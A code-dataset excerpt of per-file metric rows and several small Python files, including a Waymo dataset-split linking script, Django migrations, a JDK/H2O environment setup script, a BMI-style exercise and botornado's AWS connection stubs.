| 50.927273 | 391 | 0.544091 | 549 | 5,602 | 5.449909 | 0.191257 | 0.06016 | 0.068182 | 0.104278 | 0.750334 | 0.732286 | 0.677473 | 0.665441 | 0.665441 | 0.665441 | 0 | 0.017419 | 0.272403 | 5,602 | 109 | 392 | 51.394495 | 0.716634 | 0.008033 | 0 | 0.627451 | 1 | 0 | 0.133393 | 0.00396 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.019608 | 0 | 0.058824 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
744d99c237509f277cae64b7e0c4abf3eccd8e90 | 182 | py | Python | lists.py | the-visserd/two-hearts | fa45b04d36abf73db82b491c127e1c4b9889aa5c | [
"MIT"
] | null | null | null | lists.py | the-visserd/two-hearts | fa45b04d36abf73db82b491c127e1c4b9889aa5c | [
"MIT"
] | null | null | null | lists.py | the-visserd/two-hearts | fa45b04d36abf73db82b491c127e1c4b9889aa5c | [
"MIT"
] | null | null | null | # Set number of participants
num_dyads = 4
num_participants = num_dyads*2
# Create lists for iterations
participants = list(range(num_participants))
dyads = list(range(num_dyads)) | 20.222222 | 44 | 0.785714 | 26 | 182 | 5.307692 | 0.538462 | 0.173913 | 0.289855 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012658 | 0.131868 | 182 | 9 | 45 | 20.222222 | 0.860759 | 0.296703 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
746822afae34fec9032ebce30234428dc8e3a1c7 | 142 | py | Python | 12_module_basic/17_controller/mod.py | hemuke/python | bc99f2b5aee997083ae31f59a2b33db48c8255f3 | [
"Apache-2.0"
] | null | null | null | 12_module_basic/17_controller/mod.py | hemuke/python | bc99f2b5aee997083ae31f59a2b33db48c8255f3 | [
"Apache-2.0"
] | null | null | null | 12_module_basic/17_controller/mod.py | hemuke/python | bc99f2b5aee997083ae31f59a2b33db48c8255f3 | [
"Apache-2.0"
] | null | null | null | __all__ = ['v1', 'f1', 'C1']
v1 = 18
v2 = 36
def f1():
pass
def f2():
pass
class C1(object):
pass
class C2(object):
pass
| 8.352941 | 28 | 0.514085 | 22 | 142 | 3.136364 | 0.590909 | 0.26087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132653 | 0.309859 | 142 | 16 | 29 | 8.875 | 0.571429 | 0 | 0 | 0.363636 | 0 | 0 | 0.042254 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.181818 | false | 0.363636 | 0 | 0 | 0.363636 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 3 |
748e02775d6258ca295750d371d7fffab61b2dec | 6,151 | py | Python | data/waymo_split/setup_split.py | JuliaChae/M3D-RPN-Waymo | e73cba585563a094f67a2ba184a22330c134857c | [
"MIT"
] | 3 | 2021-03-30T17:36:29.000Z | 2021-12-07T03:02:43.000Z | data/waymo_split/setup_split.py | JuliaChae/M3D-RPN-Waymo | e73cba585563a094f67a2ba184a22330c134857c | [
"MIT"
] | 2 | 2021-02-11T15:29:46.000Z | 2021-07-19T15:03:15.000Z | data/waymo_split/setup_split.py | JuliaChae/M3D-RPN-Waymo | e73cba585563a094f67a2ba184a22330c134857c | [
"MIT"
] | null | null | null | from importlib import import_module
from getopt import getopt
import scipy.io as sio
import matplotlib.pyplot as plt
from matplotlib.path import Path
import numpy as np
import pprint
import sys
import os
import cv2
import math
import shutil
import re
# stop python from writing so much bytecode
sys.dont_write_bytecode = True
sys.path.append(os.getcwd())
np.set_printoptions(suppress=True)
# -----------------------------------------
# custom modules
# -----------------------------------------
from lib.util import *
split = 'waymo_split'
cam_num = 1
cam_view = '_frontleft'
# base paths
base_data = os.path.join(os.getcwd(), 'data')
waymo_raw_tra = dict()
waymo_raw_tra['cal'] = os.path.join(base_data, 'waymo', 'training', 'calib')
waymo_raw_tra['ims'] = os.path.join(base_data, 'waymo', 'training', 'image_{}'.format(cam_num))
waymo_raw_tra['lab'] = os.path.join(base_data, 'waymo', 'training', 'label_{}'.format(cam_num))
waymo_raw_tra['pre'] = os.path.join(base_data, 'waymo', 'training', 'prev_{}'.format(cam_num))
waymo_tra = dict()
waymo_tra['cal'] = os.path.join(base_data, split, 'training' + cam_view, 'calib')
waymo_tra['ims'] = os.path.join(base_data, split, 'training' + cam_view, 'image_{}'.format(cam_num))
waymo_tra['lab'] = os.path.join(base_data, split, 'training' + cam_view, 'label_{}'.format(cam_num))
waymo_tra['pre'] = os.path.join(base_data, split, 'training' + cam_view, 'prev_{}'.format(cam_num))
waymo_raw_val = dict()
waymo_raw_val['cal'] = os.path.join(base_data, 'waymo', 'validation', 'calib')
waymo_raw_val['ims'] = os.path.join(base_data, 'waymo', 'validation', 'image_{}'.format(cam_num))
waymo_raw_val['lab'] = os.path.join(base_data, 'waymo', 'validation', 'label_{}'.format(cam_num))
waymo_raw_val['pre'] = os.path.join(base_data, 'waymo', 'validation', 'prev_{}'.format(cam_num))
waymo_val = dict()
waymo_val['cal'] = os.path.join(base_data, split, 'validation' + cam_view, 'calib')
waymo_val['ims'] = os.path.join(base_data, split, 'validation' + cam_view, 'image_{}'.format(cam_num))
waymo_val['lab'] = os.path.join(base_data, split, 'validation' + cam_view, 'label_{}'.format(cam_num))
waymo_val['pre'] = os.path.join(base_data, split, 'validation' + cam_view, 'prev_{}'.format(cam_num))
tra_file = os.path.join(base_data, split, 'train'+ cam_view + '.txt')
val_file = os.path.join(base_data, split, 'val' + cam_view + '.txt')
# mkdirs
mkdir_if_missing(waymo_tra['cal'])
mkdir_if_missing(waymo_tra['ims'])
mkdir_if_missing(waymo_tra['lab'])
mkdir_if_missing(waymo_tra['pre'])
mkdir_if_missing(waymo_val['cal'])
mkdir_if_missing(waymo_val['ims'])
mkdir_if_missing(waymo_val['lab'])
mkdir_if_missing(waymo_val['pre'])
def link_split(list_file, raw, dst):
    """Symlink the calib/image/prev/label files listed in list_file into dst,
    renumbering them sequentially with zero-padded ids."""
    imind = 0
    with open(list_file, 'r') as text_file:
        for line in text_file:
            parsed = re.search(r'(\d+)', line)
            if parsed is None:
                continue
            src_id = str(parsed[0])
            new_id = '{:015d}'.format(imind)
            for key, suffix in [('cal', '.txt'), ('ims', '.png'), ('pre', '_01.png'),
                                ('pre', '_02.png'), ('pre', '_03.png'), ('lab', '.txt')]:
                target = os.path.join(dst[key], new_id + suffix)
                if not os.path.exists(target):
                    os.symlink(os.path.join(raw[key], src_id + suffix), target)
            imind += 1


print('Linking train')
link_split(tra_file, waymo_raw_tra, waymo_tra)

print('Linking val')
link_split(val_file, waymo_raw_val, waymo_val)

print('Done')
| 39.683871 | 102 | 0.614372 | 956 | 6,151 | 3.725941 | 0.105649 | 0.112858 | 0.154408 | 0.1516 | 0.822852 | 0.754913 | 0.714767 | 0.576081 | 0.557552 | 0.464907 | 0 | 0.009864 | 0.175906 | 6,151 | 154 | 103 | 39.941558 | 0.692839 | 0.025687 | 0 | 0.148148 | 0 | 0 | 0.128466 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.12963 | 0 | 0.12963 | 0.046296 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
77717625e122c9e733631c27956ba3d68b41cad0 | 244 | py | Python | facts/cms_app.py | evildmp/facts | bcfb0ce33cf70f208d3db3abe1bc2969ef468f01 | [
"MIT"
] | 1 | 2015-07-20T10:40:25.000Z | 2015-07-20T10:40:25.000Z | facts/cms_app.py | evildmp/facts | bcfb0ce33cf70f208d3db3abe1bc2969ef468f01 | [
"MIT"
] | null | null | null | facts/cms_app.py | evildmp/facts | bcfb0ce33cf70f208d3db3abe1bc2969ef468f01 | [
"MIT"
] | null | null | null | from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
from django.utils.translation import ugettext_lazy as _
class FactsApphook(CMSApp):
    name = _("Facts")
    urls = ["facts.urls"]


apphook_pool.register(FactsApphook)
| 24.4 | 55 | 0.778689 | 33 | 244 | 5.545455 | 0.606061 | 0.180328 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135246 | 244 | 9 | 56 | 27.111111 | 0.867299 | 0 | 0 | 0 | 0 | 0 | 0.061475 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
77a183af4339d21d85056b154e87b277a85c39f0 | 580 | py | Python | PrepareSession.py | Brett777/Predict-Churn | 1d6e5267a5e5165c1c9344103a86066751094404 | [
"MIT"
] | 12 | 2017-07-29T00:01:12.000Z | 2021-01-10T17:37:17.000Z | PrepareSession.py | Brett777/Predict-Churn | 1d6e5267a5e5165c1c9344103a86066751094404 | [
"MIT"
] | null | null | null | PrepareSession.py | Brett777/Predict-Churn | 1d6e5267a5e5165c1c9344103a86066751094404 | [
"MIT"
] | 8 | 2017-04-25T20:48:43.000Z | 2019-02-22T18:39:22.000Z | import os
os.system("sudo apt-get update")
#os.system('sudo apt-get install openjdk-8-jre -y')
os.system('wget --header "Cookie: oraclelicense=accept-securebackup-cookie" http://download.oracle.com/otn-pub/java/jdk/8u131-b11/d54c1d3a095b4ff2b6607d096fa80163/jdk-8u131-linux-x64.tar.gz')
os.system('tar -zxf jdk-8u131-linux-x64.tar.gz')
# 'export' inside os.system() runs in a throwaway shell and does not persist;
# set the variables in the current process environment instead
os.environ['JAVA_HOME'] = '/home/jupyter/Predict-Churn/jdk1.8.0_131/'
os.environ['PATH'] = os.environ['JAVA_HOME'] + 'bin:' + os.environ['PATH']
os.system('pip install http://h2o-release.s3.amazonaws.com/h2o/rel-ueno/5/Python/h2o-3.10.4.5-py2.py3-none-any.whl')
| 48.333333 | 191 | 0.753448 | 100 | 580 | 4.34 | 0.61 | 0.129032 | 0.0553 | 0.069124 | 0.21659 | 0.133641 | 0.133641 | 0.133641 | 0 | 0 | 0 | 0.105839 | 0.055172 | 580 | 12 | 192 | 48.333333 | 0.686131 | 0.086207 | 0 | 0 | 0 | 0.285714 | 0.80566 | 0.273585 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
77bf7fb84e41c5677ab2b9f034f6eabf08d19bd2 | 271 | py | Python | avalon/web/__init__.py | tshlabs/avalonms | 2291f8457ca86f2e963d518abbdce04af02d9054 | [
"MIT"
] | 1 | 2015-11-09T05:26:57.000Z | 2015-11-09T05:26:57.000Z | avalon/web/__init__.py | tshlabs/avalonms | 2291f8457ca86f2e963d518abbdce04af02d9054 | [
"MIT"
] | 4 | 2015-02-08T20:14:54.000Z | 2015-07-07T23:44:42.000Z | avalon/web/__init__.py | tshlabs/avalonms | 2291f8457ca86f2e963d518abbdce04af02d9054 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Avalon Music Server
#
# Copyright 2012-2015 TSH Labs <projects@tshlabs.org>
#
# Available under the MIT license. See LICENSE for details.
#
"""Avalon web endpoint handler package."""
from __future__ import absolute_import, unicode_literals
| 19.357143 | 59 | 0.730627 | 35 | 271 | 5.485714 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039301 | 0.154982 | 271 | 13 | 60 | 20.846154 | 0.799127 | 0.697417 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
77c96ca5e743aed616951c057bea092269047bc4 | 785 | py | Python | isiscb/isisdata/migrations/0061_auto_20170324_1929.py | bgopalachary/IsisCB | c28e3f504eea60ebeff38318d8bb2071abb28ebb | [
"MIT"
] | 4 | 2016-01-25T20:35:33.000Z | 2020-04-07T15:39:52.000Z | isiscb/isisdata/migrations/0061_auto_20170324_1929.py | bgopalachary/IsisCB | c28e3f504eea60ebeff38318d8bb2071abb28ebb | [
"MIT"
] | 41 | 2015-08-19T17:34:41.000Z | 2022-03-11T23:19:01.000Z | isiscb/isisdata/migrations/0061_auto_20170324_1929.py | bgopalachary/IsisCB | c28e3f504eea60ebeff38318d8bb2071abb28ebb | [
"MIT"
] | 2 | 2020-11-25T20:18:18.000Z | 2021-06-24T15:15:41.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-24 19:29
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):

    dependencies = [
        ('isisdata', '0060_auto_20170324_1741'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='historicaltracking',
            name='subject_content_type',
        ),
        migrations.RemoveField(
            model_name='historicaltracking',
            name='subject_instance_id',
        ),
        migrations.RemoveField(
            model_name='tracking',
            name='subject_content_type',
        ),
        migrations.RemoveField(
            model_name='tracking',
            name='subject_instance_id',
        ),
    ]
| 24.53125 | 48 | 0.592357 | 72 | 785 | 6.180556 | 0.569444 | 0.188764 | 0.233708 | 0.269663 | 0.534831 | 0.534831 | 0.534831 | 0.233708 | 0 | 0 | 0 | 0.060329 | 0.303185 | 785 | 31 | 49 | 25.322581 | 0.753199 | 0.086624 | 0 | 0.666667 | 1 | 0 | 0.22549 | 0.032213 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.208333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
77d9022afe96be8a342e54014d59fc1fa771756f | 506 | py | Python | events/migrations/0010_auto_20180528_2033.py | Akash1S/meethub | 3517ec7b4e03ca1fe50e7053fd46349f0b31740c | [
"MIT"
] | 428 | 2018-05-11T16:36:33.000Z | 2022-02-05T15:29:23.000Z | events/migrations/0010_auto_20180528_2033.py | dmkibuka/meethub | 296a1494ab6f2828b61f0b8e4ad80308306fc23a | [
"MIT"
] | 15 | 2018-05-14T16:33:29.000Z | 2021-06-09T17:28:14.000Z | events/migrations/0010_auto_20180528_2033.py | dmkibuka/meethub | 296a1494ab6f2828b61f0b8e4ad80308306fc23a | [
"MIT"
] | 53 | 2018-05-12T10:41:24.000Z | 2022-02-23T12:15:33.000Z | # Generated by Django 2.0.4 on 2018-05-28 20:33
from django.db import migrations
class Migration(migrations.Migration):

    dependencies = [
        ('events', '0009_auto_20180428_0845'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='comment',
            name='created_by',
        ),
        migrations.RemoveField(
            model_name='comment',
            name='event',
        ),
        migrations.DeleteModel(
            name='Comment',
        ),
    ]
| 20.24 | 47 | 0.547431 | 47 | 506 | 5.765957 | 0.680851 | 0.121771 | 0.191882 | 0.221402 | 0.302583 | 0.302583 | 0 | 0 | 0 | 0 | 0 | 0.092814 | 0.339921 | 506 | 24 | 48 | 21.083333 | 0.718563 | 0.088933 | 0 | 0.388889 | 1 | 0 | 0.141612 | 0.050109 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
77eeeeaecaffb5cccc2f1500b691a6a344666269 | 384 | py | Python | base/site-packages/mobileadmin/templatetags/mobile_admin_media.py | edisonlz/fastor | 342078a18363ac41d3c6b1ab29dbdd44fdb0b7b3 | [
"Apache-2.0"
] | 285 | 2019-12-23T09:50:21.000Z | 2021-12-08T09:08:49.000Z | mobileadmin/templatetags/mobile_admin_media.py | jezdez-archive/django-mobileadmin | 4d5874916ecca91610b9fbdf3c50b34c2567b83e | [
"BSD-3-Clause"
] | null | null | null | mobileadmin/templatetags/mobile_admin_media.py | jezdez-archive/django-mobileadmin | 4d5874916ecca91610b9fbdf3c50b34c2567b83e | [
"BSD-3-Clause"
] | 9 | 2019-12-23T12:59:25.000Z | 2022-03-15T05:12:11.000Z | from django.template import Library
register = Library()
def mobileadmin_media_prefix():
    """
    Returns the string contained in the setting MOBILEADMIN_MEDIA_PREFIX.
    """
    try:
        from mobileadmin.conf import settings
    except ImportError:
        return ''
    return settings.MEDIA_PREFIX


mobileadmin_media_prefix = register.simple_tag(mobileadmin_media_prefix)
| 25.6 | 73 | 0.742188 | 43 | 384 | 6.395349 | 0.55814 | 0.2 | 0.32 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.195313 | 384 | 14 | 74 | 27.428571 | 0.889968 | 0.179688 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
7acb5c4779bdc1cd6d0e8bfab4d8463b76ef166b | 413 | py | Python | 01 - EstruturaSequencial/13ex.py | lucasbraga10/ListaDeExerciciosPython | 496a6c90e33e60fdf13e841c78a22707aa7139a8 | [
"MIT"
] | null | null | null | 01 - EstruturaSequencial/13ex.py | lucasbraga10/ListaDeExerciciosPython | 496a6c90e33e60fdf13e841c78a22707aa7139a8 | [
"MIT"
] | null | null | null | 01 - EstruturaSequencial/13ex.py | lucasbraga10/ListaDeExerciciosPython | 496a6c90e33e60fdf13e841c78a22707aa7139a8 | [
"MIT"
] | null | null | null | '''13 - Tendo como dado de entrada a altura (h) de uma pessoa, construa um algoritmo que calcule seu peso ideal,
utilizando as seguintes fórmulas:
* Para homens: (72.7*h) - 58
* Para mulheres: (62.1*h) - 44.7
'''
altura = float(input('Digite a sua altura em metros: '))
print(f'O peso ideal para homens é de {(72.7*altura) - 58:.2f}Kg')
print(f'O peso ideal para mulheres é de {(62.1*altura) - 44.7:.2f}Kg')
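The same formulas can also be wrapped in a small reusable function; a sketch (`ideal_weight` is a name introduced here for illustration, not part of the exercise):

```python
def ideal_weight(height_m, sex):
    """Ideal weight in kg from height in meters, per the exercise formulas."""
    if sex == 'M':
        return 72.7 * height_m - 58
    return 62.1 * height_m - 44.7


print(f"{ideal_weight(1.80, 'M'):.2f}")  # 72.86
print(f"{ideal_weight(1.80, 'F'):.2f}")  # 67.08
```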
| 37.545455 | 112 | 0.675545 | 77 | 413 | 3.623377 | 0.571429 | 0.096774 | 0.050179 | 0.078853 | 0.143369 | 0.143369 | 0 | 0 | 0 | 0 | 0 | 0.076246 | 0.174334 | 413 | 10 | 113 | 41.3 | 0.741935 | 0.501211 | 0 | 0 | 0 | 0.333333 | 0.742424 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
7ad914f27e6f44076a38b1e259798547bd6b192b | 646 | py | Python | prototype-scripts/src/check_dependencies.py | thomaslienbacher/one-man-rps | 136dd27cfb7e3a7f2a8c016c4c758a3040dd1a02 | [
"MIT"
] | null | null | null | prototype-scripts/src/check_dependencies.py | thomaslienbacher/one-man-rps | 136dd27cfb7e3a7f2a8c016c4c758a3040dd1a02 | [
"MIT"
] | null | null | null | prototype-scripts/src/check_dependencies.py | thomaslienbacher/one-man-rps | 136dd27cfb7e3a7f2a8c016c4c758a3040dd1a02 | [
"MIT"
] | null | null | null | """
This script can be used to check whether all the Python libraries have been installed.
If a smiley appears at the end, everything is most likely installed correctly.
"""
print("Loading...")
import numpy
import matplotlib
import cv2
from picamera import mmal
import tensorflow
print("Versions installed:")
print(" numpy:", numpy.__version__)
print(" matplotlib:", matplotlib.__version__)
print(" cv2:", cv2.__version__)
print(" picamera (MMAL version):", "{}.{}".format(mmal.MMAL_VERSION_MAJOR, mmal.MMAL_VERSION_MINOR))
print(" tensorflow:", tensorflow.__version__)
print("\nIt seems that everything is installed :)")
| 30.761905 | 101 | 0.763158 | 79 | 646 | 5.987342 | 0.582278 | 0.10148 | 0.063425 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005263 | 0.117647 | 646 | 20 | 102 | 32.3 | 0.824561 | 0.280186 | 0 | 0 | 0 | 0 | 0.310722 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.384615 | 0 | 0.384615 | 0.615385 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 3 |
7af88202badb8480b931c63249d3ac2f5894816a | 12,123 | py | Python | botornado/__init__.py | bopopescu/botornado-1 | 324a1942fbe33ef41af7ae99c25478be2bdce5dc | [
"MIT"
] | 22 | 2015-04-14T13:29:48.000Z | 2017-11-15T18:03:25.000Z | botornado/__init__.py | bopopescu/botornado-1 | 324a1942fbe33ef41af7ae99c25478be2bdce5dc | [
"MIT"
] | 2 | 2015-10-26T11:10:17.000Z | 2016-04-25T23:57:57.000Z | botornado/__init__.py | bopopescu/botornado-1 | 324a1942fbe33ef41af7ae99c25478be2bdce5dc | [
"MIT"
] | 9 | 2015-04-20T14:34:25.000Z | 2021-06-09T00:13:26.000Z | # Copyright (c) 2006-2011 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010-2011, Eucalyptus Systems, Inc.
# Copyright (c) 2011, Nexenta Systems Inc.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.pyami.config import Config, BotoConfigLocations
from boto.storage_uri import BucketStorageUri, FileStorageUri
import boto.plugin
import os, re, sys
import logging
import logging.config
from boto.exception import InvalidUriError
from boto import *
def connect_sqs(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.sqs.connection.SQSConnection`
:return: A connection to Amazon's SQS
"""
from botornado.sqs.connection import AsyncSQSConnection
return AsyncSQSConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_s3(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.s3.connection.S3Connection`
:return: A connection to Amazon's S3
"""
from botornado.s3.connection import AsyncS3Connection
return AsyncS3Connection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_gs(gs_access_key_id=None, gs_secret_access_key=None, **kwargs):
"""
@type gs_access_key_id: string
@param gs_access_key_id: Your Google Cloud Storage Access Key ID
@type gs_secret_access_key: string
@param gs_secret_access_key: Your Google Cloud Storage Secret Access Key
@rtype: L{GSConnection<boto.gs.connection.GSConnection>}
@return: A connection to Google's Storage service
"""
raise BotoClientError('Not Implemented')
def connect_ec2(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.connection.EC2Connection`
:return: A connection to Amazon's EC2
"""
raise BotoClientError('Not Implemented')
def connect_elb(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.elb.ELBConnection`
:return: A connection to Amazon's Load Balancing Service
"""
raise BotoClientError('Not Implemented')
def connect_autoscale(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.autoscale.AutoScaleConnection`
:return: A connection to Amazon's Auto Scaling Service
"""
raise BotoClientError('Not Implemented')
def connect_cloudwatch(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.cloudwatch.CloudWatchConnection`
:return: A connection to Amazon's EC2 Monitoring service
"""
raise BotoClientError('Not Implemented')
def connect_sdb(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.sdb.connection.SDBConnection`
:return: A connection to Amazon's SDB
"""
raise BotoClientError('Not Implemented')
def connect_fps(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.fps.connection.FPSConnection`
:return: A connection to FPS
"""
raise BotoClientError('Not Implemented')
def connect_mturk(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.mturk.connection.MTurkConnection`
:return: A connection to MTurk
"""
raise BotoClientError('Not Implemented')
def connect_cloudfront(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
    """
    :type aws_access_key_id: string
    :param aws_access_key_id: Your AWS Access Key ID
    :type aws_secret_access_key: string
    :param aws_secret_access_key: Your AWS Secret Access Key
    :rtype: :class:`boto.cloudfront.CloudFrontConnection`
    :return: A connection to Amazon's CloudFront service
    """
    raise BotoClientError('Not Implemented')
